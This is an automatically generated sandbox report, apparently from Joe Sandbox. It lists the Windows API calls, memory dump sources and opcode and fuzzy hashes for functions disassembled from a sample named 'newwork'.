                                                                                • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                APIs
                                                                                • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFind
                                                                                • String ID:
                                                                                • API String ID: 1863332320-0
                                                                                • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                APIs
                                                                                  • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                  • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$ShowWindow
                                                                                • String ID:
                                                                                • API String ID: 3202724764-0
                                                                                • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                APIs
                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: TextWindow
                                                                                • String ID:
                                                                                • API String ID: 530164218-0
                                                                                • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                APIs
                                                                                • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                  • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 734332943-0
                                                                                • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                APIs
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory
                                                                                • String ID:
                                                                                • API String ID: 1611563598-0
                                                                                • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DestroyWindow
                                                                                • String ID:
                                                                                • API String ID: 3375834691-0
                                                                                • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1263568516-0
                                                                                • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                • Instruction Fuzzy Hash:
                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
